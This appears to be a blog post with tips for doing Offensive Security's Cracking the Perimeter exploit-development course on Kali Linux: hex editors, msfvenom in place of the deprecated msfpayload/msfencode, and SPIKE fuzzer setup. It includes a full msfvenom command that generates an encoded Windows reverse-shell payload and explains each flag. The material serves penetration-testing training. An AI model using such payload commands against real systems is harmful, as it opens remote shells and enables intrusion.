For the past month or so I’ve been working through the Crack the Perimeter course from Offensive Security. I have been enjoying the course, however the materials all reference BackTrack Linux and not it’s replacement Kali Linux. For a variety of reasons I’ve decided to plug away on the course with Kali Linux as opposed to the recommended distro. While you can perform the majority of the course without issue using Kali, there are times where the course materials reference dated tools that are either a) no longer available or b) do not function as demonstrated int he course materials.
I’ve decided to throw together this blog post to help anyone else who’s decided to tackle the course with the newer technologies, while doing my best not to give away any specifics of the course materials. Now it can be argued that a student spending the time to learn the newer technologies is a valuable learning experience, and I would agree, but I would imagine that the majority of the students are having a lot of new materials thrown at them and sometimes not questioning whether your tooling is correct can really cut down on the frustration of your exploit development.
- Hex EditorsThe course references the usage of the application Hexedit which is an application that does not come packaged with Kali. I downloaded and installed the newest version and noticed that the UI looked different from that which muts demonstrates, and there is a bit of a learning curve with the commands. For this I offer two potential solutions.
Download and install bless1apt-get install bless
And utilize the following command to open your file.1bless <application>
Now one very weird bug I’ve noticed with Bless is that you can’t simply “save” a file you’ve been working on. You’ll always get a weird error telling you there isn’t enough space.
The solution to this is to “Save As” – kind of a pain, but an easy workaround.
Your second option is to use Vim. If you’re not familiar with Vim then you’ll notice that there’s a bit of a learning curve here as well so Bless might be a better option. If you enjoy working with Vim, as I do, then you can use the following command to edit Hex files in Vim.1:%!xxd
- Generating & Encoding Payloads
Throughout the course there are several instances where the msfpayload and msfencode commands are used to generate payloads and encode them respectively. These of course have both been deprecated in favour of msfvenom which performs both of those tasks.The course materials reference creating a payload in a Raw format, dumping it into a file and then using that file as input for your encoding. This process is made much easier with msfvenom.Sample msfvenom command for encoded reverse shell code1msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.0.10 LPORT=9998 -v shell -f python -b "\x00\x2e"
-p specifies the payload
-e specifies the encoding for the payload
LHOST states the IP address to dial back to
LPORT states the port to dial back on
-v allows you to specify the variable name for the shellcode
-f lets you specify the shellcode format (python in this case)
-b specifies any bad characters you wish the shellcode to avoid
- Encoding a binary file with msfvenom
There is an example in the course where you will be expected to create shellcode from a binary file. The course materials reference the outdated tools, but the following command will allow you to ingest a binary file and encode it.1cat file.bin | msfvenom -p - -a x86 --platform windows -e x86/shikata_ga_nai -f perl
Breaking down the above command.
– The binary file is cat’d and then piped with an msfvenom command
-p – specifies not to use a payload from the list of those available to msfvenom
-a – specifies an x86 architecture
–platform windows (should be pretty self explanatory)
-e specifies the shikata_ga_nai encoding
-f specifies the perl format
- Using Spike
Fuzzing demonstrations throughout the course are performed using the Spike fuzzing framework, which apparently no longer ships with Kali Linux. To get up and running using spike use the following.12wget http://www.immunitysec.com/downloads/SPIKE2.9.tgztar -xvzf SPIKE2.9.tgz
With the framework downloaded and unpacked you’ll need to navigate to the src directory to utilize the application.1cd SPIKE/SPIKE/src
There you’ll find the audits folder and the executables referenced in the course materials.
And there you have it – I hope someone gets some use out of these tips and tricks. It should be worth noting that Offensive Security does not mandate you to use the tools they provide you in the exam so it’s a good idea for you to play around with different tools and work with those which you feel comfortable with. Rather than using the SPIKE framework you may choose to use Sulley, or rather than use OllyDbg you may opt for something like Immunity instead.